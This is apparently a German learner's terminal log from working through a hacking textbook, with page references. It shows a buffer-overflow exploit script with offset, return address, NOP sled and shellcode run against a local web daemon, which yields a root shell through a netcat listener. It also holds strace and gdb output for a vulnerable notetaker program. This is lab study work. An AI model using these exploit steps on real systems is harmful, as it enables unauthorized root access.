root@tomovic-Satellite-L300:/# cat /var/log/tinywebd.log
09/08/2013 14:38:09> Starting up..
09/08/2013 14:38:29> From 127.0.0.1:45041 "HEAD / HTTP/1.0" 404 Not Found
09/08/2013 14:39:10> Shutting down..
Wichtig ist nur, dass Starting up und shutting down drin ist. Bei mit fehlt die Index.html :-)
Seite 366:
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2548
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# jobs
[1]+ Läuft nc -l -p 31337 &
!!! Achtung bitte ändert bei euch die Werte in der sh ab.
OFFSET=524
RETADDR="\x24\xf5\xff\xbf"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xtool_tinywebd_stealth.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (302 b)] [shellcode (83 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root
09/11/2013 18:20:03> Starting up..
09/11/2013 18:22:54> Starting up..
09/11/2013 18:25:54> From 127.0.0.1:50224 "GET / HTTP/1.1" 404 Not Found
Hat doch ganz gut geklappt :-)
Seite 368:
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace ./notetaker test
execve("./notetaker", ["./notetaker", "test"], [/* 19 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdb000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=71733, ...}) = 0
mmap2(NULL, 71733, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc9000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220\232\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1770984, ...}) = 0
mmap2(NULL, 1780508, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e16000
mmap2(0xb7fc3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ad) = 0xb7fc3000
mmap2(0xb7fc6000, 11036, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc6000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e15000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e15900, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fc3000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7ffe000, 4096, PROT_READ) = 0
munmap(0xb7fc9000, 71733) = 0
brk(0) = 0x804b000
brk(0x806c000) = 0x806c000
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000
write(1, "[DEBUG] buffer @ 0x804b008: 't"..., 37[DEBUG] buffer @ 0x804b008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804b070: '/"..., 43[DEBUG] datafile @ 0x804b070: '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
write(1, "[DEBUG] file descriptor is 3\n", 29[DEBUG] file descriptor is 3
) = 29
getuid32() = 0
write(3, "\0\0\0\0", 4) = 4
write(3, "\n", 1) = 1
write(3, "test", 4) = 4
write(3, "\n", 1) = 1
close(3) = 0
write(1, "Note has been saved.\n", 21Note has been saved.
) = 21
exit_group(0) = ?
Man sieht, über die Jahre wurde viel am Kernel gearbeitet.
Seite 369:
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./notetaker
Reading symbols from /home/tomovic/Dokumente/hack/notetaker...done.
(gdb) set dis intel
Ambiguous set command "dis intel": disable-randomization, disassemble-next-line, disassembly-flavor, disconnected-dprintf...
set dis intel ist nicht unbedingt notwendig.
(gdb) disass main
Dump of assembler code for function main:
0x08048834 <+0>: push %ebp
0x08048835 <+1>: mov %esp,%ebp
0x08048837 <+3>: and $0xfffffff0,%esp
0x0804883a <+6>: sub $0x20,%esp
0x0804883d <+9>: movl $0x64,(%esp)
0x08048844 <+16>: call 0x80486ea <ec_malloc>
0x08048849 <+21>: mov %eax,0x1c(%esp)
0x0804884d <+25>: movl $0x14,(%esp)
0x08048854 <+32>: call 0x80486ea <ec_malloc>
0x08048859 <+37>: mov %eax,0x18(%esp)
0x0804885d <+41>: mov 0x18(%esp),%eax
0x08048861 <+45>: movl $0x7261762f,(%eax)
0x08048867 <+51>: movl $0x746f6e2f,0x4(%eax)
0x0804886e <+58>: movw $0x7365,0x8(%eax)
0x08048874 <+64>: movb $0x0,0xa(%eax)
0x08048878 <+68>: cmpl $0x1,0x8(%ebp)
0x0804887c <+72>: jg 0x8048893 <main+95>
0x0804887e <+74>: mov 0xc(%ebp),%eax
0x08048881 <+77>: mov (%eax),%eax
0x08048883 <+79>: mov 0x18(%esp),%edx
0x08048887 <+83>: mov %edx,0x4(%esp)
0x0804888b <+87>: mov %eax,(%esp)
0x0804888e <+90>: call 0x8048808 <usage>
0x08048893 <+95>: mov 0xc(%ebp),%eax
0x08048896 <+98>: add $0x4,%eax
0x08048899 <+101>: mov (%eax),%eax
0x0804889b <+103>: mov %eax,0x4(%esp)
0x0804889f <+107>: mov 0x1c(%esp),%eax
0x080488a3 <+111>: mov %eax,(%esp)
0x080488a6 <+114>: call 0x80484d0 <strcpy@plt>
0x080488ab <+119>: mov 0x1c(%esp),%eax
0x080488af <+123>: mov %eax,0x8(%esp)
0x080488b3 <+127>: mov 0x1c(%esp),%eax
0x080488b7 <+131>: mov %eax,0x4(%esp)
0x080488bb <+135>: movl $0x8048af3,(%esp)
0x080488c2 <+142>: call 0x8048490 <printf@plt>
0x080488c7 <+147>: mov 0x18(%esp),%eax
0x080488cb <+151>: mov %eax,0x8(%esp)
0x080488cf <+155>: mov 0x18(%esp),%eax
0x080488d3 <+159>: mov %eax,0x4(%esp)
0x080488d7 <+163>: movl $0x8048b10,(%esp)
0x080488de <+170>: call 0x8048490 <printf@plt>
0x080488e3 <+175>: movl $0x180,0x8(%esp)
---Type <return> to continue, or q <return> to quit---^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#